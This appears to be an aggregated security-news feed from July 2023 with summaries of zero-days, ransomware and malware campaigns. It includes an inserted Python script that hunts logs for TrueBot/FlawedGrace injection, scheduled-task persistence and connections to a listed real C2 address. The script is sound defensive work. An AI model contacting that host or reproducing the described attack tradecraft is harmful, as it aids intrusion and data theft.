For July 2023 Patch Tuesday, Microsoft has delivered 130 patches; among them are four for vulnerabilities actively exploited by attackers, but no patch for CVE-2023-36884, an Office and Windows HTML RCE vulnerability exploited in targeted attacks aimed at defense and government entities in Europe and North America. About CVE-2023-36884 “Microsoft is investigating reports of a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to … More

                The post Microsoft patches four exploited zero-days, but lags with fixes for a fifth (CVE-2023-36884) appeared first on Help Net Security.

                "

                Autosummary: Microsoft has also patched: CVE-2023-35311, a vulnerability that is being used to bypass the Microsoft Outlook Security Notice prompt CVE-2023-36874, an elevation of privilege (EoP) flaw in the Windows Error Reporting Service, exploited to gain administrator privileges (exploitation reported by Google TAG researchers) CVE-2023-32046, an EoP vulnerability in the Windows MSHTML Platform that allowed attackers to gain the rights of the user that is running the affected application Removing malicious signed drivers “Microsoft also issued guidance regarding the malicious use of signed drivers through its Microsoft Windows Hardware Developer Program (MWHDP),” noted Satnam Narang, senior staff research engineer at Tenable. "


                Apple issues Rapid Security Response for zero-day vulnerability

                exploits
                2023-07-11 https://www.malwarebytes.com/blog/news/2023/07/apple-issues-rapid-security-response-for-zero-day-vulnerability

Categories: Exploits and vulnerabilities; News. Tags: Apple, Safari, WebKit, macOS, iOS, iPadOS, CVE-2023-37450, drive-by, code execution

Apple has issued an update for a zero-day vulnerability in the WebKit browser engine which may be actively exploited.

The post Apple issues Rapid Security Response for zero-day vulnerability appeared first on Malwarebytes Labs.

Autosummary: While Apple doesn't disclose, discuss, or confirm security issues until a patch is made available and users have had the opportunity to apply them, what we can conclude from that description is that the bug could be used for drive-by downloads as it might allow an attacker to execute arbitrary code by tricking users into opening web pages containing specially crafted content.


                Threatening rogue finance apps removed from the Apple Store

                financial
                2023-07-11 https://www.malwarebytes.com/blog/news/2023/07/threatening-rogue-finance-apps-removed-from-the-apple-store

Categories: Personal. Tags: app, finance, india, loan, rogue, Apple Store, play store, google, threaten, blackmail, sextortion, fake, deepfake, deepfakes, morph

Multiple finance apps have been removed from the App Store after making dubious charges and issuing blackmail threats and other awful behavior.

The post Threatening rogue finance apps removed from the Apple Store appeared first on Malwarebytes Labs.

Autosummary: TechCrunch reports that “Pocket Kash, White Kash, Golden Kash, and OK Rupee” among others were taken down after getting close to the top 20 finance app listing spots.


                Law firms under cyberattack

                ciber
                2023-07-10 https://www.helpnetsecurity.com/2023/07/10/law-firm-cyberattack/

In April 2023, Australian law firm HWL Ebsworth was hit by a cyberattack that possibly resulted in data of hundreds of its clients and dozens of government agencies being compromised. The attack was claimed by the Russian-linked ALPHV/Blackcat ransomware group. “Earlier this month, the group published 1.1TB of the data it claimed to have stolen, later established to be 3.6TB worth of data,” Guardian Australia reported. Throughout January and February of 2023, eSentire deflected 10 … More

                The post Law firms under cyberattack appeared first on Help Net Security.

                "

                Autosummary: Password attacks are also frequent among law firms, primarily attributed to security vulnerabilities such as password reuse, weak passwords, excessive permissions, open access, and the absence of multi-factor authentication (MFA). As the UK National Cyber Security Centre (NCSC) noted in a recent report focusing on cyber threats to the legal sector, law firms handle sensitive client information that cybercriminals may find useful, including exploiting opportunities for insider trading, gaining the upper hand in negotiations and litigation, or subverting the course of justice. "


                Number of email-based phishing attacks surges 464%

                financial
                2023-07-10 https://www.helpnetsecurity.com/2023/07/10/evolving-cyberattack-landscape/

                The evolving cyberattack landscape reveals increasing use of generative AI systems, such as ChatGPT, by cybercriminals to craft malicious content and execute sophisticated attacks, according to Acronis. The biannual threat report highlights ransomware as the dominant risk to small and medium-sized businesses. While the number of new ransomware variants continues to decline, the severity of ransomware attacks remains significant. Equally concerning is the growing prominence of data stealers, which leverage stolen credentials to gain … More

                Autosummary: “To address the dynamic threat landscape, organizations need agile, comprehensive, unified security solutions that provide the necessary visibility to understand attacks, simplify context, and provide efficient remediation of any threat, whether it may be malware, system vulnerability, and everything in between,” Wüest continued. A sound cybersecurity posture requires a multi-layered solution that combines anti-malware, EDR, DLP, email security, vulnerability assessment, patch management, RMM, and backup capabilities.


                New disturbing ransomware trend threatens organizations

                exploits ransomware
                2023-07-10 https://www.helpnetsecurity.com/2023/07/10/encryptionless-extortion-attacks/

                Ransomware attacks increased by over 37% in 2023 compared to the previous year, with the average enterprise ransom payment exceeding $100,000 and the average demand reaching $5.3 million, according to Zscaler. Since April 2022, ThreatLabz has identified thefts of several terabytes of data in several successful ransomware attacks, which were then used to extort ransoms. Encryptionless extortion attacks “Ransomware-as-a-Service has contributed to a steady rise in sophisticated ransomware attacks,” said Deepen Desai, Global CISO … More

                Autosummary: The most prevalent ransomware families that Zscaler ThreatLabz has been tracking include BlackBasta, BlackCat, Clop, Karakurt, and LockBit, all of which pose a significant threat of financial losses, data breaches, and operational disruption to individuals and organizations of all sizes.


                France’s government is giving the police more surveillance power

                government
                2023-07-10 https://securityaffairs.com/148305/laws-and-regulations/french-government-surveillance-power.html

                The French government is going to grant law enforcement the power to spy on suspects through smartphones and other devices. French legislators are set to approve a justice reform bill that, among other measures, allows law enforcement to spy on suspects through their smartphones and other electronic devices. According to the French […]


                Honeywell acquires SCADAfence to strengthen its OT cybersecurity portfolio

                industry ciber
                2023-07-10 https://www.helpnetsecurity.com/2023/07/10/honeywell-scadafence/

                Honeywell has agreed to acquire SCADAfence, a provider of OT and IoT cybersecurity solutions for monitoring large-scale networks. SCADAfence brings proven capabilities in asset discovery, threat detection, and security governance, which are key to industrial and building management cybersecurity programs. The OT cybersecurity industry is expected to grow to more than $10 billion in the next several years. Particularly in the industrial sector, cyberattacks focused on OT systems can be a significant source of unplanned … More

                Autosummary: “SCADAfence is an ideal complement to Honeywell’s OT cybersecurity portfolio and, when combined with the Honeywell Forge Cybersecurity+ suite, it enables us to provide an end-to-end solution with applicability to asset, site and enterprise across key Honeywell sectors,” said Dehoff.


                Malware delivery to Microsoft Teams users made easy

                exploits
                2023-07-10 https://www.helpnetsecurity.com/2023/07/10/microsoft-teams-malware-delivery/

                A tool that automates the delivery of malware from external attackers to target employees’ Microsoft Teams inboxes has been released.

                [Figure: TeamsPhisher (Source: Alex Reid)]

                About the exploited vulnerability: As noted by Jumpsec researchers Max Corbridge and Tom Ellson, Microsoft Teams’ default configuration lets external tenants (i.e., M365 users outside the organization) message an organization’s employees. The same configuration doesn’t allow external tenants to send files, but that restriction can be bypassed by switching the internal … More


                New TOITOIN Banking Trojan Targeting Latin American Businesses

                financial exploits
                2023-07-10 https://thehackernews.com/2023/07/new-toitoin-banking-trojan-targeting.html
                Businesses operating in the Latin American (LATAM) region have been the target of a new Windows-based banking trojan called TOITOIN since May 2023. "This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage," Zscaler researchers Niraj Shivtarkar and Preet Kamal said in a report published last week. "These modules

                Autosummary: Included among the fetched payloads is "icepdfeditor.exe," a validly signed binary from ZOHO Corporation Private Limited, which, when executed, sideloads a rogue DLL ("ffmpeg.dll") codenamed the Krita Loader.


                Hackers Steal $20 Million by Exploiting Flaw in Revolut's Payment Systems

                exploits
                2023-07-10 https://thehackernews.com/2023/07/hackers-steal-20-million-by-exploiting.html
                Malicious actors exploited an unknown flaw in Revolut's payment systems to steal more than $20 million of the company's funds in early 2022. The development was reported by the Financial Times, citing multiple unnamed sources with knowledge of the incident. The breach had not been disclosed publicly. The fault stemmed from discrepancies between Revolut's U.S. and European systems, causing funds


                Former employee charged for attacking water treatment plant

                financial
                2023-07-10 https://www.bleepingcomputer.com/news/security/former-employee-charged-for-attacking-water-treatment-plant/
                A former employee of the Discovery Bay Water Treatment Facility in California was indicted by a federal grand jury for intentionally attempting to cause the facility's safety and protection systems to malfunction. [...]


                Razer investigates data breach claims, resets user sessions

                financial
                2023-07-10 https://www.bleepingcomputer.com/news/security/razer-investigates-data-breach-claims-resets-user-sessions/
                Gaming gear company Razer reacted to recent rumors of a massive data breach with a short statement on Twitter, letting users know that it has started an investigation into the matter. [...]

                [Figure: Session expiration message (BleepingComputer)]

                Autosummary: Researcher Bob Diachenko discovered in 2020 an unprotected Razer database containing full names, email addresses, phone numbers, customer IDs, order details, and billing and shipping addresses of 100,000 customers.


                Flaw in Revolut payment systems exploited to steal $20 million

                exploits
                2023-07-10 https://www.helpnetsecurity.com/2023/07/10/flaw-in-revolut-payment-systems-exploited-to-steal-20-million/

                Organized criminal groups exploited a flaw in Revolut’s payment systems and made off with more than $20 million of the company’s money, the Financial Times reported on Sunday, citing people with knowledge of the situation. Revolut’s cybersecurity troubles Revolut is a privately held financial technology company that offers a variety of services to over 30 million customers around the globe. It is headquartered in London and licensed and regulated by the Bank of Lithuania (within the EU). … More

                Autosummary: In September 2022, the company suffered a data breach that affected 50,150 customers worldwide: the attackers grabbed those customers’ names, addresses, email addresses, telephone numbers, part of their payment card data, and account details.


                RomCom hackers target NATO Summit attendees in phishing attacks

                financial
                2023-07-10 https://www.bleepingcomputer.com/news/security/romcom-hackers-target-nato-summit-attendees-in-phishing-attacks/
                A threat actor referred to as "RomCom" has been targeting organizations supporting Ukraine and guests of the upcoming NATO Summit, set to start tomorrow in Vilnius, Lithuania. [...]

                Autosummary: The backdoor eventually writes "security.dll" to run automatically at reboot for persistence and awaits commands from the C2, which, based on previous reporting, include data exfiltration, downloading additional payloads, deleting files or directories, spawning processes with a spoofed PID, and starting a reverse shell.


                VMware warns of exploit available for critical vRealize RCE bug

                exploits
                2023-07-10 https://www.bleepingcomputer.com/news/security/vmware-warns-of-exploit-available-for-critical-vrealize-rce-bug/
                VMware warned customers today that exploit code is now available for a critical vulnerability in the VMware Aria Operations for Logs analysis tool, which helps admins manage terabytes of application and infrastructure logs in large-scale environments. [...]


                Apple releases emergency update to fix zero-day exploited in attacks

                exploits
                2023-07-10 https://www.bleepingcomputer.com/news/apple/apple-releases-emergency-update-to-fix-zero-day-exploited-in-attacks/
                Apple has issued a new round of Rapid Security Response (RSR) updates to address a new zero-day bug exploited in attacks and impacting fully patched iPhones, Macs, and iPads. [...]


                Experts released PoC exploit for Ubiquiti EdgeRouter flaw

                exploits
                2023-07-10 https://securityaffairs.com/148334/hacking/ubiquiti-edgerouter-flaw.html

                A proof-of-concept (PoC) exploit for the CVE-2023-31998 vulnerability in Ubiquiti EdgeRouters has been publicly released. CVE-2023-31998 (CVSS v3 5.9) is a heap overflow affecting Ubiquiti EdgeRouter and AirCube devices; an attacker can exploit it to potentially execute arbitrary code or interrupt the UPnP service on a vulnerable device. The flaw resides in the […]


                Malwarebytes Browser Guard introduces three new features

                exploits
                2023-07-10 https://www.malwarebytes.com/blog/news/2023/07/malwarebytes-browser-guard-introduces-three-new-features

                Categories: Personal

                Tags: Malwarebytes, Browser Guard, Premium, new features

                Malwarebytes Browser Guard introduces three new features: content control, import & export, and historical detection statistics.


                Warning issued over increased activity of TrueBot malware

                exploits
                2023-07-10 https://www.malwarebytes.com/blog/news/2023/07/warning-issued-over-increased-activity-of-truebot-malware

                Categories: News, Ransomware

                Tags: TrueBot, Cl0p, Silence Group, CVE-2022-31199, Raspberry Robin, FlawedGrace, Cobalt Strike, Teleport

                CISA, the FBI, the MS-ISAC, and the CCCS have warned about increased activity of the TrueBot malware in the US and Canada.

                Autosummary: In a joint advisory, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Canadian Centre for Cyber Security (CCCS) have warned about newly identified TrueBot malware variants used against organizations in the US and Canada. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


                Week in review: Fileless attacks increase 1,400%, consumers ditch brands hit by ransomware

                exploits ransomware
                2023-07-09 https://www.helpnetsecurity.com/2023/07/09/week-in-review-fileless-attacks-increase-1400-consumers-ditch-brands-hit-by-ransomware/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Island Enterprise Browser: Intelligent security built into the browsing session In this Help Net Security interview, Mike Fey, CEO of Island, explains the differences between consumer browsers and the Island Enterprise Browser, how it protects organizations’ data, and how it uses contextual information to provide users with a safe browsing experience. Promoting responsible AI: Balancing innovation and regulation In this … More

                Autosummary: Infosec products of the month: June 2023 Here’s a look at the most interesting products from the past month, featuring releases from 1Password, Bitdefender, Cequence Security, ConnectSecure, Cymulate, Cytracom, Datadog, Delinea, Edgescan, Enveedo, ESET, Index Engines, Island, iStorage, Lacework, NetApp, Netscout, Netskope, NinjaOne, Okta, Permit.io, PingSafe, Quantinuum, Seceon, and Zilla Security.


                Luis Sánchez: Mexico finds murdered journalist's body in Nayarit

                latam
                2023-07-09 https://www.bbc.co.uk/news/world-latin-america-66145902?at_medium=RSS&at_campaign=KARANGA
                Luis Sánchez of La Jornada newspaper is the latest victim in a spate of attacks on journalists.


                Charming Kitten hackers use new ‘NokNok’ malware for macOS

                exploits
                2023-07-09 https://www.bleepingcomputer.com/news/security/charming-kitten-hackers-use-new-noknok-malware-for-macos/
                Security researchers have observed a new campaign they attribute to the Charming Kitten APT group, in which the hackers used new NokNok malware that targets macOS systems. [...]

                [Figure: GorjolEcho infection chain (Proofpoint)]

                Autosummary: Attacks on macOS: If the victim uses macOS, which the hackers typically realize after they fail to infect them with the Windows payload, they send a new link to “library-store[.]camdvr[.]org” that hosts a ZIP file masquerading as a RUSI (Royal United Services Institute) VPN app.


                Recife: Eight killed in Brazil apartment block collapse

                latam
                2023-07-08 https://www.bbc.co.uk/news/world-latin-america-66140720?at_medium=RSS&at_campaign=KARANGA
                The four-storey block of flats collapsed in the early hours of the morning in the city of Recife.


                Google addressed 3 actively exploited flaws in Android

                exploits
                2023-07-08 https://securityaffairs.com/148286/mobile-2/android-actively-exploited-flaws-fixed.html

                Google has released the July security updates for Android, addressing dozens of vulnerabilities, including three actively exploited flaws. The July security updates for Android address more than 40 vulnerabilities, including three flaws that were actively exploited in targeted attacks. “There are indications that the following may be under limited, targeted exploitation,” reads the security bulletin. CVE-2023-26083 is […]


                New ‘Big Head’ ransomware displays fake Windows update alert

                exploits ransomware
                2023-07-08 https://www.bleepingcomputer.com/news/security/new-big-head-ransomware-displays-fake-windows-update-alert/
                Security researchers have dissected a recently emerged ransomware strain named "Big Head" that may be spreading through malvertising that promotes fake Windows updates and Microsoft Word installers. [...]

                [Figure: Processes terminated before encryption (Trend Micro)]

                Autosummary: The Windows, Recycle Bin, Program Files, Temp, Program Data, Microsoft, and App Data directories are skipped during encryption to avoid rendering the system unusable.


                Brazil building collapse: Drone footage shows destruction

                latam
                2023-07-08 https://www.bbc.co.uk/news/world-latin-america-66141285?at_medium=RSS&at_campaign=KARANGA
                A building collapsed on 7 July in Brazil's northeastern state of Pernambuco, leaving at least eight dead.


                Scammers using AI voice technology to commit crimes

                financial
                2023-07-07 https://www.helpnetsecurity.com/2023/07/07/ai-voice-cloning-scams/

                The use of platforms like Cash App, Zelle, and Venmo for peer-to-peer payments has surged, with related scams increasing by over 58%. There has also been a corresponding 44% rise in scams stemming from the theft of personal documents, according to IDIQ. AI voice technology The report also highlights the rise of AI voice scams as a significant trend in 2023. AI voice technology enables scammers to create remarkably realistic voices and … More

                Autosummary: Protecting against AI voice cloning scams. Ways the public can help protect themselves from these scams: being cautious of unsolicited offers, requests, and calls; always verifying identities, including having a family “password”; using strong cybersecurity practices, including unique passwords, multi-factor authentication and a VPN; protecting and monitoring personal information; and educating themselves on the latest scams and trends as new scams continue to arise. Scammers are also taking advantage of peer-to-peer payment platforms’ lack of protection, convenience, and limited refund policies to steal from victims as part of Cash App, Zelle and Venmo scams.


                Google Releases Android Patch Update for 3 Actively Exploited Vulnerabilities

                exploits
                2023-07-07 https://thehackernews.com/2023/07/google-releases-android-patch-update.html
                Google has released its monthly security updates for the Android operating system, addressing 46 new software vulnerabilities. Among these, three have been identified as actively exploited in targeted attacks. One of them, tracked as CVE-2023-26083, is a memory leak flaw affecting the Arm Mali GPU driver for Bifrost, Avalon, and Valhall chips. This particular

                Autosummary: The second patch level, released on July 5, targets kernel and closed source components, tackling 20 vulnerabilities in Kernel, Arm, Imagination Technologies, MediaTek, and Qualcomm components.


                JumpCloud Resets API Keys Amid Ongoing Cybersecurity Incident

                ciber
                2023-07-07 https://thehackernews.com/2023/07/jumpcloud-resets-api-keys-amid-ongoing.html
                JumpCloud, a provider of cloud-based identity and access management solutions, has swiftly reacted to an ongoing cybersecurity incident that impacted some of its clients. As part of its damage control efforts, JumpCloud has reset the application programming interface (API) keys of all customers affected by this event, aiming to protect their data. The company has informed the concerned

                Autosummary: This API key reset will, however, disrupt certain functionality, such as AD import, HRIS integrations, JumpCloud PowerShell modules, JumpCloud Slack apps, Directory Insights Serverless apps, ADMU, third-party zero-touch MDM packages, Command Triggers, Okta SCIM integration, Azure AD SCIM integration, Workato, Aquera, Tray, and more.


                Cybersecurity Agencies Sound Alarm on Rising TrueBot Malware Attacks

                exploits ciber
                2023-07-07 https://thehackernews.com/2023/07/cybersecurity-agencies-sound-alarm-on.html
                Cybersecurity agencies have warned about the emergence of new variants of the TrueBot malware. This enhanced threat is now targeting companies in the U.S. and Canada with the intention of extracting confidential data from infiltrated systems. These sophisticated attacks exploit a critical vulnerability (CVE-2022-31199) in the widely used Netwrix Auditor server and its associated agents. This

                Autosummary: "The tool can create scheduled tasks and inject payloads into msiexec[.]exe and svchost[.]exe, which are command processes that enable FlawedGrace to establish a command and control (C2) connection to 92.118.36[.]199, for example, as well as load dynamic link libraries (DLLs) to accomplish privilege escalation," the advisory says. Importantly, the Netwrix Auditor software is employed by more than 13,000 organizations worldwide, including notable firms such as Airbus, Allianz, the UK NHS, and Virgin.
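The injection-then-C2 pattern quoted from the advisory above (and summarized in the Malwarebytes item on the same advisory) is something a SOC can hunt for directly in endpoint telemetry. The following Python is an added example, not code from the advisory, from CISA, or from any vendor named on this page: it parses constructed key=value log lines modelled on Sysmon process-creation (EventID 1) and network-connection (EventID 3) events and flags msiexec.exe or svchost.exe connecting to the advisory's C2 address, those same processes reaching arbitrary public hosts on ports other than 80/443, and a schtasks.exe /create launched from under them. The sample log lines, field names, paths and severity thresholds are assumptions; the only indicator taken from the page is 92.118.36.199.

```python
"""Added example: hunt for the FlawedGrace/TrueBot tradecraft described in the
joint advisory (payload injection into msiexec.exe / svchost.exe, C2 connection,
scheduled-task persistence). Log lines and field names are constructed here and
imitate Sysmon EventID 1 (process create) and EventID 3 (network connect)."""
import ipaddress
import ntpath
import re

KNOWN_C2 = {"92.118.36.199"}                      # the one IOC quoted from the advisory
INJECTION_TARGETS = {"msiexec.exe", "svchost.exe"}  # hosts the advisory says get injected
COMMON_WEB_PORTS = {"80", "443"}

# Constructed sample telemetry (not real logs). Quoted values may contain spaces.
SAMPLE_LOGS = [
    r'EventID=3 Image=C:\Windows\System32\svchost.exe DestinationIp=10.0.0.5 DestinationPort=445',
    r'EventID=3 Image=C:\Windows\System32\msiexec.exe DestinationIp=92.118.36.199 DestinationPort=443',
    r'EventID=3 Image=C:\Windows\System32\svchost.exe DestinationIp=93.184.216.34 DestinationPort=8080',
    r'EventID=1 Image=C:\Windows\System32\schtasks.exe ParentImage=C:\Windows\System32\msiexec.exe '
    r'CommandLine="schtasks /create /tn Updater /tr C:\Users\Public\u.exe /sc onlogon"',
    r'EventID=1 Image=C:\Windows\System32\schtasks.exe ParentImage=C:\Windows\explorer.exe CommandLine="schtasks /query"',
    r'EventID=3 Image="C:\Program Files\Mozilla Firefox\firefox.exe" DestinationIp=151.101.1.69 DestinationPort=443',
]

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    """Parse one key=value line into a dict (values may be quoted or bare)."""
    return {key: quoted or bare for key, quoted, bare in _KV.findall(line)}


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _is_public(ip: str) -> bool:
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def classify(event: dict):
    """Return (severity, reason) for a suspicious event, else None."""
    image = _basename(event.get("Image", ""))
    if event.get("EventID") == "3" and image in INJECTION_TARGETS:
        dst, port = event.get("DestinationIp", ""), event.get("DestinationPort", "")
        if dst in KNOWN_C2:
            return "high", f"{image} connected to known C2 {dst}:{port}"
        if _is_public(dst) and port not in COMMON_WEB_PORTS:
            # msiexec/svchost do reach the internet legitimately (Windows Update,
            # MSI downloads), so only off-port traffic is raised, and only as medium.
            return "medium", f"{image} connected to public host {dst}:{port} on an unusual port"
    if event.get("EventID") == "1" and image == "schtasks.exe":
        parent = _basename(event.get("ParentImage", ""))
        if "/create" in event.get("CommandLine", "").lower() and parent in INJECTION_TARGETS:
            return "high", f"scheduled task created from under {parent}: {event['CommandLine']}"
    return None


def scan(lines):
    """Run classify() over every line; return findings with their line index."""
    findings = []
    for index, line in enumerate(lines):
        verdict = classify(parse_event(line))
        if verdict:
            findings.append({"line": index, "severity": verdict[0], "reason": verdict[1]})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(f"[{finding['severity']}] line {finding['line']}: {finding['reason']}")
```

On the constructed input this raises three findings: the msiexec.exe connection to the advisory's C2, the svchost.exe connection to a public host on 8080, and the schtasks /create spawned under msiexec.exe; the SMB connection to a private address, the schtasks /query and the browser traffic stay quiet. Two practical notes: advisories defang indicators with "[.]", so strip that before loading them into a set like KNOWN_C2, and in a real deployment the field names would come from your EDR's schema rather than the Sysmon-style keys assumed here.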


                Amazon deforestation down by a third in 2023, says Brazilian government

                latam government
                2023-07-07 https://www.bbc.co.uk/news/world-latin-america-66129200?at_medium=RSS&at_campaign=KARANGA
                Government data shows the decrease in Lula's first six months, reversing a years-long trend.


                Close Security Gaps with Continuous Threat Exposure Management

                ransomware
                2023-07-07 https://thehackernews.com/2023/07/close-security-gaps-with-continuous.html
                CISOs, security leaders, and SOC teams often struggle with limited visibility into all connections made to their company-owned assets and networks. They are hindered by a lack of the open-source intelligence and technology required for proactive, continuous, and effective discovery and protection of their systems, data, and assets. As advanced threat actors constantly search for easily

                Autosummary: Key features and capabilities of a robust CTEM program include: automated discovery of assets and management of vulnerabilities; ongoing vulnerability assessment of threat exposures within the attack surface; security validation to eliminate false positives and guarantee accuracy; gaining visibility into the attacker's perspective and potential avenues of attack; and prioritizing remediation efforts and integrating them with DevSecOps workflows. Security executives require continuous threat exposure management solutions that enhance, support, and expand their in-house team's abilities to neutralize threats at their origin, preventing costly and damaging security breaches. In 2023, despite significant investments in security infrastructure and skilled personnel, existing approaches are struggling to effectively reduce risks, manage threat exposures, and prevent security breaches.


                BlackByte 2.0 Ransomware: Infiltrate, Encrypt, and Extort in Just 5 Days

                exploits ransomware
                2023-07-07 https://thehackernews.com/2023/07/blackbyte-20-ransomware-infiltrate.html
                Ransomware attacks are a major problem for organizations everywhere, and the severity of this problem continues to intensify. Recently, Microsoft's Incident Response team investigated the BlackByte 2.0 ransomware attacks and exposed these cyber strikes' terrifying velocity and damaging nature. The findings indicate that hackers can complete the entire attack process, from gaining initial access

                Autosummary: The findings indicate that hackers can complete the entire attack process, from gaining initial access to causing significant damage, in just five days.


                Martin Lewis says deepfake scam of him is "frightening"

                financial
                2023-07-07 https://www.bbc.co.uk/news/uk-66131229?at_medium=RSS&at_campaign=KARANGA
                The consumer finance expert said he has been the subject of fake adverts for years, but this was the first in video.


                Critical TootRoot bug lets attackers hijack Mastodon servers

                exploits
                2023-07-07 https://www.bleepingcomputer.com/news/security/critical-tootroot-bug-lets-attackers-hijack-mastodon-servers/
                Mastodon, the free and open-source decentralized social networking platform, has patched four vulnerabilities, including a critical one that allows hackers to create arbitrary files on instance-hosting servers using specially crafted media files. [...]


                The Need for Risk-Based Vulnerability Management to Combat Threats

                exploits
                2023-07-07 https://www.bleepingcomputer.com/news/security/the-need-for-risk-based-vulnerability-management-to-combat-threats/
                Risk-based vulnerability management platforms are better equipped to help organizations prioritize threats for mitigation. Learn more from Outpost24 about risk-based vulnerability management. [...]

                Autosummary: Eliminate cyber risk, harness real-time, actionable insights and receive automated, round-the-clock risk-based vulnerability management today with Outscan NX. In comparison to traditional approaches to vulnerability management, a risk-based strategy enables organizations to assess the level of risk posed by vulnerabilities.


                CISA warns govt agencies to patch actively exploited Android driver

                exploits
                2023-07-07 https://www.bleepingcomputer.com/news/security/cisa-warns-govt-agencies-to-patch-actively-exploited-android-driver/
                CISA today ordered federal agencies to patch a high-severity Arm Mali GPU kernel driver privilege escalation flaw that was added to its list of actively exploited vulnerabilities and addressed in this month's Android security updates. [...]

                Autosummary: A third vulnerability, tracked as CVE-2023-2136 and rated critical severity, is an integer overflow bug in Google's Skia, an open-source multi-platform 2D graphics library.


                Vishing Goes High-Tech: New "Letscall" Malware Employs Voice Traffic Routing

                financial exploits
                2023-07-07 https://thehackernews.com/2023/07/vishing-goes-high-tech-new-letscall.html
                Researchers have issued a warning about an emerging and advanced form of voice phishing (vishing) known as "Letscall." This technique is currently targeting individuals in South Korea. The criminals behind "Letscall" employ a multi-step attack to deceive victims into downloading malicious apps from a counterfeit Google Play Store website. Once the malicious software is installed, it redirects

                Autosummary: The "Letscall" group consists of Android developers, designers, frontend and backend developers, as well as call operators specializing in voice social engineering attacks.


                A man has been charged with a cyber attack on the Discovery Bay water treatment facility

                financial
                2023-07-07 https://securityaffairs.com/148258/cyber-crime/discovery-bay-water-treatment-facility-attck.html

                A man from Tracy, California, has been charged with a computer attack on the Discovery Bay water treatment facility. Rambler Gallo (53) has been charged with intentionally causing damage to a computer after he allegedly breached the network of the Discovery Bay Water Treatment Facility. The man targeted the water […]

                Autosummary: Then, in January 2021, after Gallo had resigned from Company A, he allegedly accessed the facility’s computer system remotely and transmitted a command to uninstall software that was the main hub of the facility’s computer network and that protected the entire water treatment system, including water pressure, filtration, and chemical levels.”


                How kids pay the price for ransomware attacks on education

                exploits ransomware
                2023-07-07 https://www.malwarebytes.com/blog/news/2023/07/school-documents-outed-by-ransomware-gangs-can-have-long-lasting-consequences

                Categories: News

                Categories: Personal

                Categories: Ransomware

                Tags: ransomware

                Tags: vice

                Tags: education

                Tags: files

                Tags: dark web

                Tags: ssn

                Tags: stolen identity

                Data stolen during attacks on schools can contain highly sensitive information.

                The post How kids pay the price for ransomware attacks on education appeared first on Malwarebytes Labs.

                Autosummary: [Figure: Known ransomware attacks against education, June 2022-May 2023] And, while ransomware attacks against education are a global phenomenon, the USA and the UK saw far higher rates of attacks than other countries. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The ransomware groups are to blame, of course, but the education sector can improve a few things to lessen the impact of a ransomware attack.


                Bangladesh government website leaked data of millions of citizens

                government
                2023-07-07 https://securityaffairs.com/148264/data-breach/bangladesh-government-website-data-leak.html

                A researcher recently discovered that a Bangladesh government website leaks the personal data of citizens. The researcher Viktor Markopoulos discovered a Bangladeshi government website that was leaking the personal information of millions of Bangladesh citizens. According to TechCrunch, which first reported the news, the leaked data included full names, phone numbers, email addresses, and national […]

                The post Bangladesh government website leaked data of millions of citizens appeared first on Security Affairs.



                How to cultivate a culture of continuous cybersecurity improvement

                ransomware ciber
                2023-07-06 https://www.helpnetsecurity.com/2023/07/06/cybersecurity-improvement/

                Regulatory compliance and cybersecurity improvement are not two sides of the same coin: they are distinct pillars that demand specialized attention. Achieving compliance does not create an impenetrable fortress against threats, it merely creates a baseline defense. So, how can organizations transition from a reactive, “tick-box” mindset to a proactive culture of continuous cyber improvement? This question is central to increasing cyber resilience. For those navigating the patchwork of regulatory environments, a deeper understanding of … More

                The post How to cultivate a culture of continuous cybersecurity improvement appeared first on Help Net Security.

                Autosummary: CISOs must manage a blend of real-time activities, like monitoring network traffic, threat hunting, and vulnerability detection, with periodic activities, such as pen testing, risk assessments, and audits. On the other hand, periodic security practices, such as penetration testing, provide an opportunity to stress-test the system and uncover potential weaknesses. The urgency of real-time vulnerability management: to build a culture of cyber improvement, businesses must foster an effective vulnerability management strategy that relies on incessantly evaluating exposure to potential threats and taking proactive steps to mitigate them.


                Cybercriminals can break voice authentication with 99% success rate

                ciber
                2023-07-06 https://www.helpnetsecurity.com/2023/07/06/voice-authentication-insecurity/

                Computer scientists at the University of Waterloo have discovered a method of attack that can successfully bypass voice authentication security systems with up to a 99% success rate after only six tries. Experts expose flaws in voiceprint technology: voice authentication – which allows companies to verify the identity of their clients via a supposedly unique “voiceprint” – has increasingly been used in remote banking, call centers and other security-critical scenarios. “When enrolling in voice authentication, … More

                The post Cybercriminals can break voice authentication with 99% success rate appeared first on Help Net Security.

                Autosummary: Kassis’ supervisor, computer science professor Urs Hengartner added, “By demonstrating the insecurity of voice authentication, we hope that companies relying on voice authentication as their only authentication factor will consider deploying additional or stronger authentication measures.”


                Over 130,000 solar energy monitoring systems exposed online

                industry
                2023-07-06 https://www.bleepingcomputer.com/news/security/over-130-000-solar-energy-monitoring-systems-exposed-online/
                Security researchers are warning that tens of thousands of photovoltaic (PV) monitoring and diagnostic systems are reachable over the public web, making them potential targets for hackers. [...]


                Microsoft fixes bug behind Windows LSA protection warnings, again

                exploits
                2023-07-06 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-behind-windows-lsa-protection-warnings-again/
                Microsoft is again pushing a Defender Antivirus update (first issued in April and pulled in May) that fixes a known issue triggering Windows Security warnings that Local Security Authority (LSA) Protection is off. [...]

                Autosummary: "This known issue was previously resolved with an update for Microsoft Defender Antivirus antimalware platform KB5007651 (Version 1.0.2303.27001) but issues were found, and that update is no longer being offered to devices," Microsoft said at the time.


                Ransomware accounts for 54% of cyber threats in the health sector

                exploits
                2023-07-06 https://securityaffairs.com/148207/reports/enisa-threat-landscape-report-health-sector.html

